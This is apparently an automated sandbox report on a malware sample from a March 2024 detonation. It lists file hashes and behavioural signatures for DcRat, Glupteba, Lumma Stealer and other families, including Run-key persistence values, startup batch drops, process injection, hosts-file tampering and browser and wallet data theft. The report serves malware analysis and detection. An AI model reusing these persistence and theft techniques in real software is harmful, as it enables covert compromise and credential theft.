C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 92148678dc4c72d55b8a3320ee69fc3a |
| SHA1 | 7d9984dbe8a03040f3a5548e1e5943a205e1f407 |
| SHA256 | 764a6927e9cde70369ef8dfc7e2753279ac39e4e2897fb18f4c31bcaf7543a2f |
| SHA512 | a2efcbee8ab8ec7e9dd7ce6c588e4b80909059de2a077fb54c7f38d3d9b208876260c12dc802a1789d7a1dc33220b078cad67119fd88f0b679c1f7effbf93fa0 |
memory/2416-491-0x0000000000400000-0x0000000000537000-memory.dmp
\Users\Admin\AppData\Local\Temp\FE0F.exe
| MD5 | 6983707f4dcf1b3bf2d6fb2160457356 |
| SHA1 | d4da6fa06eedf67ad9ed882dbd4af8db65820f02 |
| SHA256 | c3788a4e7403eb75b442a22509dd0431cfa0f2eb7fc503cb097e3f1cf60b300c |
| SHA512 | 38f3e8141ebf541402ab67d18039ff5f7b30432cb86f88b9445537b6011a4e22e506d5445d6de55ef2ae1d7d201798cfa20d087069a685cefaaae629a6bb543c |
memory/604-499-0x0000000001C90000-0x0000000001D22000-memory.dmp
memory/1952-505-0x0000000000400000-0x0000000000537000-memory.dmp
memory/1756-508-0x0000000000400000-0x00000000008DF000-memory.dmp
memory/2704-509-0x0000000000400000-0x00000000008DF000-memory.dmp
memory/1756-511-0x0000000000400000-0x00000000008DF000-memory.dmp
C:\Users\Admin\AppData\Local\3b3cc6b9-35e4-49ed-98f9-9617d74d1e31\build2.exe
| MD5 | d37b17fc3b9162060a60cd9c9f5f7e2c |
| SHA1 | 5bcd761db5662cebdb06f372d8cb731a9b98d1c5 |
| SHA256 | 36826a94f7aabd1f0d71abc6850e64a499768bd30cab361e8724d546e495e35f |
| SHA512 | 04b0fcc597afba17b8be46eacee58c7e8d38c7efa9247ab5b3cbf1ae3ed8dc2e6e909b7dab28b2a41f08fb37e950abb6ca97553adf0e20335c6864d942bef6ea |
C:\Users\Admin\AppData\Local\3b3cc6b9-35e4-49ed-98f9-9617d74d1e31\build3.exe
| MD5 | 41b883a061c95e9b9cb17d4ca50de770 |
| SHA1 | 1daf96ec21d53d9a4699cea9b4db08cda6fbb5ad |
| SHA256 | fef2c8ca07c500e416fd7700a381c39899ee26ce1119f62e7c65cf922ce8b408 |
| SHA512 | cdd1bb3a36182575cd715a52815765161eeaa3849e72c1c2a9a4e84cc43af9f8ec4997e642702bb3de41f162d2e8fd8717f6f8302bba5306821ee4d155626319 |
memory/1880-574-0x0000000000230000-0x0000000000262000-memory.dmp
memory/1880-573-0x0000000002080000-0x0000000002180000-memory.dmp
memory/1032-585-0x0000000000400000-0x0000000000645000-memory.dmp
memory/1952-587-0x0000000000400000-0x0000000000537000-memory.dmp
memory/448-588-0x0000000002660000-0x0000000002704000-memory.dmp
memory/2640-597-0x0000000000220000-0x0000000000224000-memory.dmp
memory/2640-595-0x0000000000C72000-0x0000000000C83000-memory.dmp
memory/304-609-0x0000000000400000-0x0000000000406000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 71b25f6ab180233b9b03c3f0866d485d |
| SHA1 | 5a325949733542026f886ea89d8a2c44c9b0d886 |
| SHA256 | f13470764d4fb1042d6c2c8aaf50a3f79dc0264f88ceacd190cf87dfe074e099 |
| SHA512 | 701ca87d5a7c984c94e78ad1b9d617a84ac3bc99f16f47731a2e111a855608379bb7ab83907dd2e20cdbb414eaf73e2cac24841eb62df173a298bd73ab927f5c |
memory/2704-666-0x0000000000400000-0x00000000008DF000-memory.dmp
memory/1032-701-0x0000000000400000-0x0000000000645000-memory.dmp
memory/448-704-0x0000000002660000-0x0000000002704000-memory.dmp
memory/1032-751-0x0000000000400000-0x0000000000645000-memory.dmp
memory/992-753-0x0000000000400000-0x000000000063B000-memory.dmp
C:\Users\Admin\Pictures\PHZUeKsym6c4ao1N4lAzfMjT.exe
| MD5 | 3d233051324a244029b80824692b2ad4 |
| SHA1 | a053ebdacbd5db447c35df6c4c1686920593ef96 |
| SHA256 | fbd467ce72bca00eea3aaa6f32abc8aca1a734030d082458e21e1fe91e6a8d84 |
| SHA512 | 7f19c6400ac46556a9441844242b1acb0b2f11a47f5d51f6d092406a8c759a6d78c578bb5b15035e7cd1cdb3035acf0db884708b0da1a83eb652a50a68e3a949 |
memory/2640-774-0x00000000008E2000-0x00000000008F2000-memory.dmp
memory/1636-790-0x000000001B3B0000-0x000000001B692000-memory.dmp
memory/1636-791-0x0000000002280000-0x0000000002288000-memory.dmp
memory/1636-793-0x000007FEF4E20000-0x000007FEF57BD000-memory.dmp
memory/1636-795-0x0000000002A80000-0x0000000002B00000-memory.dmp
memory/1636-796-0x000007FEF4E20000-0x000007FEF57BD000-memory.dmp
memory/1636-797-0x0000000002A80000-0x0000000002B00000-memory.dmp
memory/1636-798-0x0000000002A80000-0x0000000002B00000-memory.dmp
memory/1636-799-0x000007FEF4E20000-0x000007FEF57BD000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | c64faed18750dc002321b5e88fd3fa99 |
| SHA1 | 3ccba54a5cbc43e815bc3cab4b9bbbfda9185d1b |
| SHA256 | f243f43539eac4b47246e6f38c941ddd0f6dea21e4586be2dd7e1837310d647e |
| SHA512 | 4577e8aa8dfff03f035e600561190485b7ebbc41f008839d3a40cce4af723a370ce892b095da75dee02726b33b4de1f590e7dd1816aa04d835c5d4dad13e38dd |
C:\Users\Admin\AppData\Local\ElHS5HX1hnz9VhL5KqXpj20J.exe
| MD5 | 5b423612b36cde7f2745455c5dd82577 |
| SHA1 | 0187c7c80743b44e9e0c193e993294e3b969cc3d |
| SHA256 | e0840d2ea74a00dcc545d770b91d9d889e5a82c7bedf1b989e0a89db04685b09 |
| SHA512 | c26a1e7e96dbd178d961c630abd8e564ef69532f386fb198eb20119a88ecab2fe885d71ac0c90687c18910ce00c445f352a5e8fbf5328f3403964f7c7802414c |
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
| MD5 | 9f4073776ad439895a9761c804f3be8e |
| SHA1 | dcd11406157e362aa1744490af252eaf5eef5247 |
| SHA256 | 5534b4723a59e805d2ad0f53af8103747bdf5adff3d8a7486ffee820132e9a55 |
| SHA512 | cc47bf5216659de981911ac928994a9a36441d6197f5a850ff82cca71afdab0ede43a55538e6a0c33384e4118ad1afc073a0f129172caabba388d076291f686f |
C:\Users\Admin\AppData\Local\Temp\43BA.exe
| MD5 | 3960abf1cf1e42dee448bcd6d09381b1 |
| SHA1 | 1c92cad57ae12fa79d31b3a61560c0ac82cdda24 |
| SHA256 | 9175e09343e8232774e9e74dc214ca5a1348ee88146ab9ea1f4c44d48905736c |
| SHA512 | 9e72eb8035d578f3a473d8907d8058cd84eb7f8f1e8e9caa512a87aebbffce7a302af95a030a919408ac050d7fdd0f962e9c4f59ba89963508951ad546accfd9 |
C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe
| MD5 | dcb505dc2b9d8aac05f4ca0727f5eadb |
| SHA1 | 4f633edb62de05f3d7c241c8bc19c1e0be7ced75 |
| SHA256 | 61f9194b9f33611ec902f02755cf2e86f0bbc84c2102c6e5d1874f9bae78e551 |
| SHA512 | 31e1fce9aca3b5d9afc85640af04b4542b9897f7d60b699e3153516137d9358d3c101cacc04e9e594e36b8622e9489cecf0dda210662563565d80fb9a33549b3 |
C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
| MD5 | 6ef869ec0937002372e26deee02cf28d |
| SHA1 | a65b50983671cb24c8497d38ad1b27cd85d74142 |
| SHA256 | 4f5857dcc102a6c20f6577f670b998297c905763b095e0acb850668314296cc9 |
| SHA512 | 41d7108a67893670e19db5d5a02cf22fba75c23af20d98aedb74b6610f2df8aae192f0b1f5d27fbebad259776d1f19b08413c8ed059707f7d7f0f5ac6cc9005a |
C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
| MD5 | 302226e29c52137c544f5475ebecc1db |
| SHA1 | 2f28288cdfeb10fdd544695b92e135a85ba22bfb |
| SHA256 | 0533842acb46c38dadae58bb349be072ec74d3b5f46c4528d6ca57756e2704f7 |
| SHA512 | f425277f2a4d4986f7ab8f6b949b874e9711acd87d11acf6558463a4ecfe07165cd7a88ec94e3048687ff9bfb2879083f42538d7b1fb697d9ae5540b02d65d18 |
C:\ProgramData\DirectSoundDriver 2.36.198.67\DirectSoundDriver 2.36.198.67.exe
| MD5 | 2bfeb783c63070e9fb8f38dd98a40812 |
| SHA1 | b45960fc1e0420491d3339feaf9669c19217306d |
| SHA256 | e58c3ba3718c288df0086b2035d284b27a2f25066b5b31ca00b31fa650e44758 |
| SHA512 | 7935e297f7a92decd412cc786968600abce184a881b72d32b60d767e0fb0024362afec283f22e3b147d7c59be8b88b47ad09e77ff945b38437eb371093b50a34 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 5fbfb7fec94b0cc0f3d71b383559ce4c |
| SHA1 | d2efd6ef1af22396f3ed5637f0ac672722a6257a |
| SHA256 | 4ef18f09d8c49abcec4efdcc91e28f19f140531937640cc1d5e184992e0dd804 |
| SHA512 | cf6e8049f1a8178b270cb1728f95f228aef5df501ef88e48a2432d423f284acbf198b7d74aed9190f8dc8819b8d77dc18edfd82b50ae3119cbf8a01d2f827d8f |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SC1N4QPFGBQXCV92ET1O.temp
| MD5 | ed4f9ec6ac00a7079f9d9b057428017c |
| SHA1 | 32c5013b48f24bf2e993c00e5c7795de1e91a810 |
| SHA256 | c5452de3be2536de4682ae1c8a410dfbd4948391e3458eca977e0db009b5ddb9 |
| SHA512 | 0b90052adc09a3642d2088e767da6338aa76c0b2f3be8407a55cddd77512deab9e8fa3f21e57643d7dff793136ee778357bb465baee9559d1b5bbb35faceccf7 |
C:\Windows\System32\drivers\etc\hosts
| MD5 | 3e9af076957c5b2f9c9ce5ec994bea05 |
| SHA1 | a8c7326f6bceffaeed1c2bb8d7165e56497965fe |
| SHA256 | e332ebfed27e0bb08b84dfda05acc7f0fa1b6281678e0120c5b7c893a75df47e |
| SHA512 | 933ba0d69e7b78537348c0dc1bf83fb069f98bb93d31c638dc79c4a48d12d879c474bd61e3cbde44622baef5e20fb92ebf16c66128672e4a6d4ee20afbf9d01f |
Analysis: behavioral2
Detonation Overview
Submitted
2024-03-10 16:21
Reported
2024-03-10 16:37
Platform
win10v2004-20240226-en
Max time kernel
453s
Max time network
681s
Command Line
Signatures
DcRat
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rNkuvk8Zg4i325fSyIYGB9Wt.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KF9ZwM1htMp18z3Hvz5q82yB.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fG6Eq6XzP5233KSsUEpsaRC8.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\auGVM38sZMaymz2pA3UtXgzI.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sjbOP8xnNE7tcTgPiGZ6wwas.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ksGwX541NFYLLQyfzzA31AQ8.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KJ7YeE2j2u6MjBVRbzctBXge.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
Glupteba
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Lumma Stealer
SmokeLoader
Socks5Systemz
Creates new service(s)
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\drivers\etc\hosts | C:\Users\Admin\Pictures\eNjkg8FaEHV29ts9FvoPTUAW.exe | N/A |
| File created | C:\Windows\system32\drivers\etc\hosts | C:\ProgramData\Google\Chrome\updater.exe | N/A |
| File created | C:\Windows\system32\drivers\etc\hosts | C:\Users\Admin\Pictures\SvBLsShwKaL8PBWdxkM39f0T.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Stops running service(s)
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\DD14.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KJ7YeE2j2u6MjBVRbzctBXge.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GdoQsQKJMNaKGyIxLiOgybfw.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\auGVM38sZMaymz2pA3UtXgzI.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rNkuvk8Zg4i325fSyIYGB9Wt.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ksGwX541NFYLLQyfzzA31AQ8.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fG6Eq6XzP5233KSsUEpsaRC8.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f1ODWN4z7ta2SjcSOf0vGFq5.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1u4JgkTky8yZgPPekFi7TGF4.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vUoKruUEtYqpKN3g8HfnfUiJ.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dk8dESr3kL9No4zXo1hFURzq.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sjbOP8xnNE7tcTgPiGZ6wwas.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\eEStE6qx5rsB5duSlZN80DNR.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KF9ZwM1htMp18z3Hvz5q82yB.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFyXFu8vFw28FFkvTMLOmWRL.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Reads data files stored by FTP clients
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Unexpected DNS network traffic destination
| Description | Indicator | Process | Target |
| Destination IP | 91.211.247.248 | N/A | N/A |
| Destination IP | 91.211.247.248 | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\Pictures\GNL8HPgpc3h1ughp9OmayOAG.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\0e5d7f2d-6754-4be0-b473-73a35806b01c\\DD14.exe\" --AutoStart" | C:\Users\Admin\AppData\Local\Temp\DD14.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Windows\rss\csrss.exe | N/A |
Checks installed software on the system
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\D: | C:\Users\Admin\Pictures\tJ6HSphWPkDhrW4fuBx7FKRM.exe | N/A |
| File opened (read-only) | \??\F: | C:\Users\Admin\Pictures\tJ6HSphWPkDhrW4fuBx7FKRM.exe | N/A |
| File opened (read-only) | \??\D: | C:\Users\Admin\Pictures\tJ6HSphWPkDhrW4fuBx7FKRM.exe | N/A |
| File opened (read-only) | \??\F: | C:\Users\Admin\Pictures\tJ6HSphWPkDhrW4fuBx7FKRM.exe | N/A |
| File opened (read-only) | \??\D: | C:\Users\Admin\Pictures\Z5Pwcmkmjtj7jGqzkWXixJVL.exe | N/A |
| File opened (read-only) | \??\F: | C:\Users\Admin\Pictures\Z5Pwcmkmjtj7jGqzkWXixJVL.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
Manipulates WinMonFS driver.
| Description | Indicator | Process | Target |
| File opened for modification | \??\WinMonFS | C:\Windows\rss\csrss.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\Users\Admin\Pictures\eNjkg8FaEHV29ts9FvoPTUAW.exe | N/A |
| File opened for modification | C:\Windows\system32\eventvwr.msc | C:\Windows\system32\mmc.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\ProgramData\Google\Chrome\updater.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\Users\Admin\Pictures\SvBLsShwKaL8PBWdxkM39f0T.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 5652 set thread context of 5724 | N/A | C:\Users\Admin\AppData\Local\Temp\file.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe |
| PID 536 set thread context of 508 | N/A | C:\ProgramData\Google\Chrome\updater.exe | C:\Windows\system32\conhost.exe |
| PID 536 set thread context of 3008 | N/A | C:\ProgramData\Google\Chrome\updater.exe | C:\Windows\explorer.exe |
| PID 3404 set thread context of 2712 | N/A | C:\Users\Admin\AppData\Local\Temp\DD14.exe | C:\Users\Admin\AppData\Local\Temp\DD14.exe |
| PID 3352 set thread context of 2348 | N/A | C:\Users\Admin\AppData\Local\Temp\8F7.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 5992 set thread context of 5392 | N/A | C:\Users\Admin\AppData\Local\Temp\DD14.exe | C:\Users\Admin\AppData\Local\Temp\DD14.exe |
| PID 3852 set thread context of 4764 | N/A | C:\Users\Admin\AppData\Local\Temp\EE16.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
Checks for VirtualBox DLLs, possible anti-VM trick
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\Pictures\GNL8HPgpc3h1ughp9OmayOAG.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\Pictures\GNL8HPgpc3h1ughp9OmayOAG.exe | N/A |
| File created | C:\Windows\windefender.exe | C:\Windows\rss\csrss.exe | N/A |
| File opened for modification | C:\Windows\windefender.exe | C:\Windows\rss\csrss.exe | N/A |
| File opened for modification | C:\Windows\rss | C:\Users\Admin\Pictures\GNL8HPgpc3h1ughp9OmayOAG.exe | N/A |
Launches sc.exe
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\syncUpd.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\DD14.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\syncUpd.exe |
NSIS installer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Roaming\cwvffbi | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Pictures\vn0dZ1KknFaoEqIsGOGNDVH5.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Pictures\vn0dZ1KknFaoEqIsGOGNDVH5.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Roaming\cwvffbi | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Roaming\cwvffbi | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Pictures\q4oVVOJYlJSTjyE4pBQQcwUd.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Pictures\vn0dZ1KknFaoEqIsGOGNDVH5.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Pictures\q4oVVOJYlJSTjyE4pBQQcwUd.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Pictures\q4oVVOJYlJSTjyE4pBQQcwUd.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\syncUpd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\syncUpd.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
GoLang User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
Modifies Internet Explorer settings
